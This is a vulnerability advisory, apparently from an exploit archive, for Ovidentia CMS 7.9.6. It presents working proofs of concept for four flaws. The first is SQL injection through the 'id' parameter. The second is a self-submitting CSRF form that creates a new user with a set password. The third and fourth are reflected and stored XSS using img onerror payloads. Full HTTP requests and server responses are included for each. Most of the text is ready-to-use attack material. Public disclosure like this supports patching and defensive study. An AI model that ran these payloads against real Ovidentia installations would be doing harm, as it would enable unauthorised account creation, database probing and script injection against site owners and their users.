Ovidentia 7.9.6 Multiple Vulnerabilities

2013.12.08
Credit: sajith
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################### [~] Exploit Title: Ovidentia 7.9.6 Multiple Vulnerabilities [~] Author: sajith [~] version: Ovidentia 7.9.6 [~]Vendor Homepage: http://www.ovidentia.org/ [~] vulnerable app link:http://www.ovidentia.org/telecharger ########################################################### [1]SQL injection vulnerability Log into admin panel and access delegate functionality > managing administrators where &id parameter (shown below link) is vulnerable to sql injection http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1 POC by sajith shetty: request: GET /cms/ovidentia-7-9-6/index.php?tg=delegat&idx=mem&id=1%27 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95; bab_Tree.myTreeView= response: style="cursor: pointer" onclick="s=document.getElementById('babParam_1_5_0'); s.style.display=='none'?s.style.display='':s.style.display='none'">[+]</span><div style="display: none; background-color: #EEEECC" id="babParam_1_5_0">[C:\xampp\htdocs\cms\ovidentia-7-9-6\ovidentia\index.php]</div>) <i>called at</i> [C:\xampp\htdocs\cms\ovidentia-7-9-6\index.php:25]</pre><h2>Can't execute query : <br><pre>select * from bab_dg_admin where id_dg=1'</pre></h2> <p><b>Database Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</b></p> <p>This script cannot continue, terminating. [2]CSRF vulnerability log into the admin portal and access the create user functionality http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=users&idx=Create&pos=A&grp= using csrf vulnerability it was possible to add new user. <head> <title>POC by sajith shetty</title> </head> <body> <form action="http://127.0.0.1/cms/ovidentia-7-9-6/index.php" enctype="multipart/form-data" method="post" id="formid"> <input type="hidden" name="user[sendpwd]" value="0" /> <input type="hidden" name="user[password1]" value="P@ssw0rd1" /> <input type="hidden" name="user[notifyuser]" value="0" /> <input type="hidden" name="grp" value="" /> <input type="hidden" name="idx" value="Create" /> <input type="hidden" name="user[password2]" value="P@ssw0rd1" /> <input type="hidden" name="user[givenname]" value="POC" /> <input type="hidden" name="pos" value="A" /> <input type="hidden" name="widget_filepicker_job_uid[]" value="52a35b7fac6c9" /> <input type="hidden" name="user[email]" value="poctester@xyz.com" /> <input type="hidden" name="user[nickname]" value="1234" /> <input type="hidden" name="user[sn]" value="test" /> <input type="hidden" name="tg" value="users" /> <input type="hidden" name="user[mn]" value="tester" /> </form> <script> document.getElementById('formid').submit(); </script> </body> </html> [3]Reflected XSS http://127.0.0.1/cms/ovidentia-7-9-6/index.php/foo"><img src=x onerror=prompt(1);> request: GET /cms/ovidentia-7-9-6/index.php/foo%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95 response: <div id="ovidentia_headbottomright"> <div> <!-- Icons based on Monoblack (look for Gnome by Matteo Landi) : http://linux.softpedia.com/developer/Matteo-Landi-3851.html --> <a href="http://127.0.0.1/cms/ovidentia-7-9-6/foo"><img src=x onerror=prompt(1);>" title="Home"><img src="skins/theme_default/images/home-reflect.gif" alt="Home" title="Home" /></a> <!-- Script OVML: show the list of the buttons of quick accesses to functions by leaning on entries available in user section --> [4]Stored xss log into the admin portal and access mail functionlity and create new domain using link below http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y here Name & Description field is vulnerable to stored XSS .payload:"><img src=x onerror=prompt(1);> request: POST /cms/ovidentia-7-9-6/index.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildoms&idx=create&userid=0&bgrp=y Cookie: OV146706993=62t0i0e1mc2r0r4elhdm967h95 Content-Type: application/x-www-form-urlencoded Content-Length: 301 tg=maildoms&idx=list&userid=0&bgrp=y&adddom=add&dname=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28111%29%3B%3E&description=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28222%29%3B%3E&accessmethod=pop3&inmailserver=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28333%29%3B%3E&inportserver=110&submit=Dom%E4ne+hinzuf%FCgen response: <td>Registrierte User</td> </tr> <tr class="BabSiteAdminFontBackground"> <td> <a href=" http://127.0.0.1/cms/ovidentia-7-9-6/index.php?tg=maildom&idx=modify&item=2&userid=0&bgrp=y">"><img src=x onerror=prompt(111);></a> </td> <td>"><img src=x onerror=prompt(222);></td> <td>Registrierte User</td> </tr> </table> </td> </tr> </table> <br> </div>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top